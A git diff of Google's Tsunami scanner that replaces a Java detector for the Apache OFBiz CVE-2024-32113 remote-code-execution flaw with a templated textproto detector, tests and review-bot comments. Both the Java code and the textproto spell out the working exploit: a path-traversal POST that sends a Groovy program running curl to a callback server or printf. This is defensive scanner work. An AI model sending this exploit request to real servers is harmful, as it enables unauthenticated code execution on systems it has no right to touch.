diff --git a/google/README.md b/google/README.md index f9493cf98..3412a721c 100644 --- a/google/README.md +++ b/google/README.md @@ -43,6 +43,7 @@ This directory contains all Tsunami plugins published by Google. * [Apache Solr VelocityResponseWriter RCE (CVE-2019-17558) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/solr_cve201917558) * [Tomcat Ghostcat (CVE-2020-1938) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/tomcat/ghostcat) * [vBulletin Pre-Auth RCE (CVE-2019-16759) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/vbulletin/cve201916759) +* [Apache OFBiz RCE (CVE-2024-32113) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto) ## Planned Detectors diff --git a/google/detectors/rce/cve202432113/README.md b/google/detectors/rce/cve202432113/README.md deleted file mode 100644 index 92c4626ed..000000000 --- a/google/detectors/rce/cve202432113/README.md +++ /dev/null @@ -1,15 +0,0 @@ -# CVE-2024-32113 Detector - -This detector identifies instances of Apache OFBiz which are vulnerable to -CVE-2024-32113. This vulnerability is present in APache OFBiz berfore version -18.12.13. - -## Build jar file for this plugin - -Using `gradlew`: - -```shell -./gradlew jar -``` - -Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/google/detectors/rce/cve202432113/build.gradle b/google/detectors/rce/cve202432113/build.gradle deleted file mode 100644 index f56bc4033..000000000 --- a/google/detectors/rce/cve202432113/build.gradle +++ /dev/null 
@@ -1,39 +0,0 @@
-plugins {
- id 'java-library'
-}
-
-description = 'Apache OFBiz CVE-2024-32113 detector for Tsunami.'
-group = 'com.google.tsunami'
-version = '0.0.1-SNAPSHOT'
-
-repositories {
- maven { // The google mirror is less flaky than mavenCentral()
- url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
- }
- mavenCentral()
- mavenLocal()
-}
-
-
-
-def coreRepoBranch = System.getenv("GITBRANCH_TSUNAMI_CORE") ?: "stable"
-def tcsRepoBranch = System.getenv("GITBRANCH_TSUNAMI_TCS") ?: "stable"
-
-dependencies {
- implementation("com.google.tsunami:tsunami-common") {
- version { branch = "${coreRepoBranch}" }
- }
- implementation("com.google.tsunami:tsunami-plugin") {
- version { branch = "${coreRepoBranch}" }
- }
- implementation("com.google.tsunami:tsunami-proto") {
- version { branch = "${coreRepoBranch}" }
- }
-
- testImplementation "junit:junit:4.13.2"
- testImplementation "com.squareup.okhttp3:mockwebserver:3.12.0"
- testImplementation "org.mockito:mockito-core:5.18.0"
- testImplementation "com.google.truth:truth:1.4.4"
- testImplementation "com.google.truth.extensions:truth-java8-extension:1.4.4"
- testImplementation "com.google.truth.extensions:truth-proto-extension:1.4.4"
-}
diff --git a/google/detectors/rce/cve202432113/settings.gradle b/google/detectors/rce/cve202432113/settings.gradle
deleted file mode 100644
index d1a865b4d..000000000
--- a/google/detectors/rce/cve202432113/settings.gradle
+++ /dev/null
@@ -1,12 +0,0 @@
-rootProject.name = 'ApacheOFBiz_CVE_2024_32113_Detector'
-
-def coreRepository = System.getenv("GITREPO_TSUNAMI_CORE") ?: "https://github.com/google/tsunami-security-scanner.git"
-def tcsRepository = System.getenv("GITREPO_TSUNAMI_TCS") ?: "https://github.com/google/tsunami-security-scanner-callback-server.git"
-
-sourceControl {
- gitRepository("${coreRepository}") {
- producesModule("com.google.tsunami:tsunami-common")
- producesModule("com.google.tsunami:tsunami-plugin")
- producesModule("com.google.tsunami:tsunami-proto")
- }
-}
diff --git a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java b/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java
deleted file mode 100644
index e6a93c53f..000000000
--- a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java
+++ /dev/null
@@ -1,172 +0,0 @@ -/* - * Copyright 2025 Google LLC - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.google.tsunami.plugins.detectors.rce.cve202432113; - -import static com.google.common.base.Preconditions.checkNotNull; -import static com.google.common.collect.ImmutableList.toImmutableList; -import static java.nio.charset.StandardCharsets.UTF_8; - -import com.google.common.annotations.VisibleForTesting; -import com.google.common.collect.ImmutableList; -import com.google.common.flogger.GoogleLogger; -import com.google.protobuf.ByteString; -import com.google.protobuf.util.Timestamps; -import com.google.tsunami.common.data.NetworkServiceUtils; -import com.google.tsunami.common.net.http.HttpClient; -import com.google.tsunami.common.net.http.HttpHeaders; -import com.google.tsunami.common.net.http.HttpRequest; -import com.google.tsunami.common.net.http.HttpResponse; -import com.google.tsunami.common.time.UtcClock; -import com.google.tsunami.plugin.PluginType; -import com.google.tsunami.plugin.VulnDetector; -import com.google.tsunami.plugin.annotations.ForWebService; -import com.google.tsunami.plugin.annotations.PluginInfo; -import com.google.tsunami.plugin.payload.Payload; -import com.google.tsunami.plugin.payload.PayloadGenerator; -import com.google.tsunami.proto.DetectionReport; -import com.google.tsunami.proto.DetectionReportList; -import com.google.tsunami.proto.DetectionStatus; -import com.google.tsunami.proto.NetworkService; -import 
com.google.tsunami.proto.PayloadGeneratorConfig; -import com.google.tsunami.proto.Severity; -import com.google.tsunami.proto.TargetInfo; -import com.google.tsunami.proto.Vulnerability; -import com.google.tsunami.proto.VulnerabilityId; -import java.io.IOException; -import java.net.URLEncoder; -import java.time.Clock; -import javax.inject.Inject; - -/** Tsunami plugin for Apache OFBiz CVE-2024-32113. */ -@ForWebService -@PluginInfo( - type = PluginType.VULN_DETECTION, - name = "Apache OFBiz CVE-2024-32113 Detector", - version = "0.1", - description = "This plugin detects Apache OFBiz instances vulnerable to CVE-2024-32113.", - author = "Ryan Beltran (ryanbeltran@google.com)", - bootstrapModule = Cve202432113DetectorBootstrapModule.class) -public final class Cve202432113Detector implements VulnDetector { - private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); - - private final Clock utcClock; - private final HttpClient httpClient; - private final PayloadGenerator payloadGenerator; - - @Inject - Cve202432113Detector( - @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { - this.utcClock = checkNotNull(utcClock); - this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); - this.payloadGenerator = checkNotNull(payloadGenerator); - } - - @Override - public ImmutableList getAdvisories() { - return ImmutableList.of( - Vulnerability.newBuilder() - .setMainId( - VulnerabilityId.newBuilder() - .setPublisher(VULNERABILITY_REPORT_PUBLISHER) - .setValue(VULNERABILITY_REPORT_ID)) - .addRelatedId( - VulnerabilityId.newBuilder().setPublisher("CVE").setValue(VULNERABILITY_REPORT_ID)) - .setSeverity(Severity.CRITICAL) - .setTitle(VULNERABILITY_REPORT_TITLE) - .setDescription(VULNERABILITY_REPORT_DESCRIPTION) - .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION) - .build()); - } - - @Override - public DetectionReportList detect( - TargetInfo targetInfo, ImmutableList matchedServices) { - 
logger.atInfo().log("Apache OFBiz CVE-2024-32113 Detector starts detecting."); - - return DetectionReportList.newBuilder() - .addAllDetectionReports( - matchedServices.stream() - .filter(this::isServiceVulnerable) - .map(networkService -> buildDetectionReport(targetInfo, networkService)) - .collect(toImmutableList())) - .build(); - } - - private boolean isServiceVulnerable(NetworkService networkService) { - String rootUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); - String targetUri = rootUri + "webtools/control/forgotPassword/foo/../ProgramExport"; - - Payload payload = - payloadGenerator.generate( - PayloadGeneratorConfig.newBuilder() - .setInterpretationEnvironment( - PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) - .setExecutionEnvironment( - PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) - .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) - .build()); - - String encodedGroovyProgram = - URLEncoder.encode( - "throw new Exception('" + payload.getPayload() + "'.execute().text);", UTF_8); - - try { - HttpRequest req = - HttpRequest.post(targetUri) - .setHeaders( - HttpHeaders.builder() - .addHeader("Content-Type", "application/x-www-form-urlencoded") - .build()) - .setRequestBody(ByteString.copyFromUtf8("groovyProgram=" + encodedGroovyProgram)) - .build(); - HttpResponse res = httpClient.send(req, networkService); - return payload.checkIfExecuted(res.bodyBytes()); - - } catch (IOException e) { - logger.atWarning().withCause(e).log( - "Failed to exploit '%s'. 
Maybe it is not vulnerable", targetUri); - return false; - } - } - - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_TITLE = - "CVE-2024-32113 Remote code execution vulnerability in Apache OFBiz"; - - @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE-2024-32113"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_DESCRIPTION = - "The scanner detected that attackers can execute arbitrary code on the server via restricted" - + " endpoints without authorization"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_RECOMMENDATION = - "Upgrade to Apache OFBiz patched version 18.12.13."; - - private DetectionReport buildDetectionReport( - TargetInfo targetInfo, NetworkService vulnerableNetworkService) { - return DetectionReport.newBuilder() - .setTargetInfo(targetInfo) - .setNetworkService(vulnerableNetworkService) - .setDetectionTimestamp(Timestamps.fromMillis(utcClock.instant().toEpochMilli())) - .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) - .setVulnerability(this.getAdvisories().get(0)) - .build(); - } -} diff --git a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java b/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java deleted file mode 100644 index 6f7e29b09..000000000 --- a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java +++ /dev/null 
@@ -1,31 +0,0 @@
-/*
- * Copyright 2025 Google LLC
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package com.google.tsunami.plugins.detectors.rce.cve202432113;
-
-import com.google.tsunami.plugin.PluginBootstrapModule;
-
-/** An example Guice module that bootstraps the {@link ExampleVulnDetector}. */
-public final class Cve202432113DetectorBootstrapModule extends PluginBootstrapModule {
-
- @Override
- protected void configurePlugin() {
- // Tsunami relies heavily on Guice (https://github.com/google/guice). All Guice bindings for
- // your plugin should be implemented here.
-
- // registerPlugin method is required in order for the Tsunami scanner to identify your plugin.
- registerPlugin(Cve202432113Detector.class);
- }
-}
diff --git a/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java b/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java
deleted file mode 100644
index e83c38935..000000000
--- a/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java
+++ /dev/null
@@ -1,158 +0,0 @@ -/* - * Copyright 2025 Google LLC - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.google.tsunami.plugins.detectors.rce.cve202432113; - -import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; -import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; -import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_DESCRIPTION; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_ID; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_PUBLISHER; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_RECOMMENDATION; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_TITLE; - -import com.google.common.collect.ImmutableList; -import com.google.inject.Guice; -import com.google.protobuf.util.Timestamps; -import com.google.tsunami.common.net.http.HttpClientModule; -import com.google.tsunami.common.net.http.HttpStatus; -import com.google.tsunami.common.time.testing.FakeUtcClock; -import com.google.tsunami.common.time.testing.FakeUtcClockModule; -import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; -import 
com.google.tsunami.proto.DetectionReport; -import com.google.tsunami.proto.DetectionReportList; -import com.google.tsunami.proto.DetectionStatus; -import com.google.tsunami.proto.NetworkService; -import com.google.tsunami.proto.Severity; -import com.google.tsunami.proto.TargetInfo; -import com.google.tsunami.proto.TransportProtocol; -import com.google.tsunami.proto.Vulnerability; -import com.google.tsunami.proto.VulnerabilityId; -import java.io.IOException; -import java.security.SecureRandom; -import java.time.Instant; -import java.util.Arrays; -import javax.inject.Inject; -import okhttp3.mockwebserver.MockResponse; -import okhttp3.mockwebserver.MockWebServer; -import org.junit.Before; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.junit.runners.JUnit4; - -@RunWith(JUnit4.class) -public final class Cve202432113DetectorTest { - private final FakeUtcClock fakeUtcClock = - FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); - - @Inject private Cve202432113Detector detector; - - private final MockWebServer mockOfBizServer = new MockWebServer(); - - private final SecureRandom testSecureRandom = - new SecureRandom() { - @Override - public void nextBytes(byte[] bytes) { - Arrays.fill(bytes, (byte) 0xFF); - } - }; - - private static final String VULNERABLE_BODY = - """ -
-

The Following Errors Occurred:

-

java.lang.Exception: TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END

-
-"""; - - @Before - public void setUp() throws IOException { - mockOfBizServer.start(); - - Guice.createInjector( - new FakeUtcClockModule(fakeUtcClock), - new HttpClientModule.Builder().build(), - FakePayloadGeneratorModule.builder().setSecureRng(testSecureRandom).build(), - new Cve202432113DetectorBootstrapModule()) - .injectMembers(this); - } - - NetworkService createNetworkService(MockWebServer mockService) { - return NetworkService.newBuilder() - .setNetworkEndpoint(forHostnameAndPort(mockService.getHostName(), mockService.getPort())) - .setTransportProtocol(TransportProtocol.TCP) - .setServiceName("http") - .build(); - } - - @Test - public void detect_whenVulnerable_reportsVulnerability() throws IOException { - NetworkService service = createNetworkService(mockOfBizServer); - mockOfBizServer.enqueue( - new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(VULNERABLE_BODY)); - - TargetInfo target = - TargetInfo.newBuilder() - .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName())) - .build(); - - DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); - - assertThat(detectionReports.getDetectionReportsList()) - .containsExactly(buildValidDetectionReport(target, service, fakeUtcClock)); - } - - @Test - public void detect_whenNotVulnerable_reportsEmpty() throws IOException { - NetworkService service = createNetworkService(mockOfBizServer); - String body = "hello world"; - mockOfBizServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(body)); - - TargetInfo target = - TargetInfo.newBuilder() - .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName())) - .build(); - - DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); - - assertThat(detectionReports.getDetectionReportsList()).isEmpty(); - } - - DetectionReport buildValidDetectionReport( - TargetInfo target, NetworkService service, FakeUtcClock fakeUtcClock) { - - return 
DetectionReport.newBuilder() - .setTargetInfo(target) - .setNetworkService(service) - .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) - .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) - .setVulnerability( - Vulnerability.newBuilder() - .setMainId( - VulnerabilityId.newBuilder() - .setPublisher(VULNERABILITY_REPORT_PUBLISHER) - .setValue(VULNERABILITY_REPORT_ID)) - .addRelatedId( - VulnerabilityId.newBuilder() - .setPublisher("CVE") - .setValue(VULNERABILITY_REPORT_ID)) - .setSeverity(Severity.CRITICAL) - .setTitle(VULNERABILITY_REPORT_TITLE) - .setDescription(VULNERABILITY_REPORT_DESCRIPTION) - .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION)) - .build(); - } -} diff --git a/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto new file mode 100644 index 000000000..7ce7bb3a6 --- /dev/null +++ b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto 
@@ -0,0 +1,121 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+ type: VULN_DETECTION
+ name: "ApacheOfbiz_CVE_2024_32113"
+ author:
+ "Robert Dick (robert@doyensec.com) for templated version, "
+ "Ryan Beltran (ryanbeltran@google.com) for original Java version"
+ version: "2.0"
+}
+
+finding: {
+ main_id: {
+ publisher: "GOOGLE"
+ value: "CVE_2024_32113"
+ }
+ severity: CRITICAL
+ title: "CVE-2024-32113 Remote code execution vulnerability in Apache OFBiz"
+ description:
+ "The scanner detected that attackers can execute arbitrary code on the server via restricted"
+ " endpoints without authorization"
+ recommendation:
+ "Upgrade to Apache OFBiz patched version 18.12.13."
+ related_id: {
+ publisher: "CVE"
+ value: "CVE-2024-32113"
+ }
+}
+
+###########
+# ACTIONS #
+###########
+
+# original didn't have this but we include it just in case to reduce false positives
+
+actions: {
+ name: "fingerprint_ofbiz"
+ http_request: {
+ method: GET
+ uri: "/webtools/control/main"
+ response: {
+ expect_all: {
+ conditions: [
+ { body: {} contains: "OFBiz" }
+ ]
+ }
+ }
+ }
+}
+
+actions: {
+ name: "execute_payload"
+ http_request: {
+ method: POST
+ uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
+ headers: [
+ { name: "Content-Type" value: "application/x-www-form-urlencoded" }
+ ]
+ data:
+ 'groovyProgram=throw%20new%20Exception%28%27curl%20{{ T_CBS_URI }}%27.execute%28%29.text%29%3b'
+ }
+}
+
+actions: {
+ name: "sleep"
+ utility: { sleep: { duration_ms: 1000 } }
+}
+
+actions: {
+ name: "check_callback_server_logs"
+ callback_server: { action_type: CHECK }
+}
+
+# reflective one for if the callback server is disabled
+
+actions: {
+ name: "execute_payload_reflective"
+ http_request: {
+ method: POST
+ uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
+ headers: [
+ { name: "Content-Type" value: "application/x-www-form-urlencoded" }
+ ]
+ data:
+ 'groovyProgram=throw%20new%20Exception%28%27printf%20%25x%20133713371337%27.execute%28%29.text%29%3b'
+ response: {
+ http_status: 200
+ expect_all: {
+ conditions: [
+ { body: {} contains: "1f21f020c9" }
+ ]
+ }
+ }
+ }
+}
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+ condition: REQUIRES_CALLBACK_SERVER
+ actions: [
+ "fingerprint_ofbiz",
+ "execute_payload",
+ "sleep",
+ "check_callback_server_logs"
+ ]
+}
+
+workflows: {
+ actions: [
+ "fingerprint_ofbiz",
+ "execute_payload_reflective"
+ ]
+}
diff --git a/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto
new file mode 100644
index 000000000..49453e3c5
--- /dev/null
+++ b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto
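Review bot: The callback workflow depends on `curl` being present on the target, and `execute_payload` carries no response condition, so a vulnerable host without curl would go unreported whenever a callback server is configured — assuming the engine runs only the first workflow whose condition matches, which should be confirmed. The removed Java detector requested a `REFLECTIVE_RCE` payload and checked the response body, so this is a coverage change worth recording above the `REQUIRES_CALLBACK_SERVER` workflow, e.g. `# Needs curl on the target; the reflective workflow below is not tried when a callback server is enabled.` Separately, `main_id.value` is now `"CVE_2024_32113"` while the Java version reported `"CVE-2024-32113"` as its main id; if downstream triage or deduplication keys on that value, findings from the two versions will not match, so either keep the old value or document the rename.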
@@ -0,0 +1,129 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+ tested_plugin: "ApacheOfbiz_CVE_2024_32113"
+}
+
+# Note: even though the request includes path traversal characters,
+# the tests seem to normalize the path in the request. Therefore,
+# we have to make listeners on the normalized path instead of the
+# one containing path traversal characters.
+
+tests: {
+ name: "whenOobVulnerable_returnsVuln"
+ expect_vulnerability: true
+
+ mock_callback_server: {
+ enabled: true
+ has_interaction: true
+ }
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/webtools/control/main"
+ status: 200
+ body_content:
+ '... OFBiz: Web Tools: Web Tools Main Page ...'
+ },
+ {
+ uri: "/webtools/control/forgotPassword/ProgramExport"
+ status: 200
+ body_content:
+ '...'
+ }
+ ]
+ }
+}
+
+
+tests: {
+ name: "whenOobNotVulnerable_returnsNotVuln"
+ expect_vulnerability: false
+
+ mock_callback_server: {
+ enabled: true
+ has_interaction: false
+ }
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/webtools/control/main"
+ status: 200
+ body_content:
+ '... OFBiz: Web Tools: Web Tools Main Page ...'
+ },
+ {
+ uri: "/webtools/control/forgotPassword/ProgramExport"
+ status: 200
+ body_content:
+ '...'
+ }
+ ]
+ }
+}
+
+# non-callback tests
+
+tests: {
+ name: "whenReflectiveVulnerable_returnsVuln"
+ expect_vulnerability: true
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/webtools/control/main"
+ status: 200
+ body_content:
+ '... OFBiz: Web Tools: Web Tools Main Page ...'
+ },
+ {
+ uri: "/webtools/control/forgotPassword/ProgramExport"
+ status: 200
+ body_content:
+ '... 1f21f020c9 ...'
+ }
+ ]
+ }
+}
+
+tests: {
+ name: "whenReflectiveNotVulnerable_returnsNotVuln"
+ expect_vulnerability: false
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "/webtools/control/main"
+ status: 200
+ body_content:
+ '... OFBiz: Web Tools: Web Tools Main Page ...'
+ },
+ {
+ uri: "/webtools/control/forgotPassword/ProgramExport"
+ status: 200
+ body_content:
+ '... 133713371337 ...'
+ }
+ ]
+ }
+}
+
+tests: {
+ name: "whenRandomServer_returnsFalse"
+ expect_vulnerability: false
+
+
+ mock_http_server: {
+ mock_responses: [
+ {
+ uri: "TSUNAMI_MAGIC_ANY_URI"
+ status: 200
+ body_content: "Hello world"
+ }
+ ]
+ }
+}
+
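Review bot: Every mock here listens on `/webtools/control/forgotPassword/ProgramExport`, so none of these tests can tell whether the `foo/../` segment in the plugin's `uri` reaches the server as written or is collapsed by the HTTP client first, which is what the comment at the top of the file reports for the test harness. If the scanner's client normalizes the same way on a live scan, the request on the wire differs from the one the plugin is written to send, and the finding and its "upgrade to 18.12.13" recommendation may be attributed to the wrong condition; this is inferred from the comment and needs a check against a real instance. I would extend the comment with the open question, e.g. `# TODO: confirm on a live scan whether "foo/../" is sent as written; these mocks accept only the normalized path.` A reflective case that returns the marker with a non-200 status would also pin the `http_status: 200` condition, which no test currently exercises.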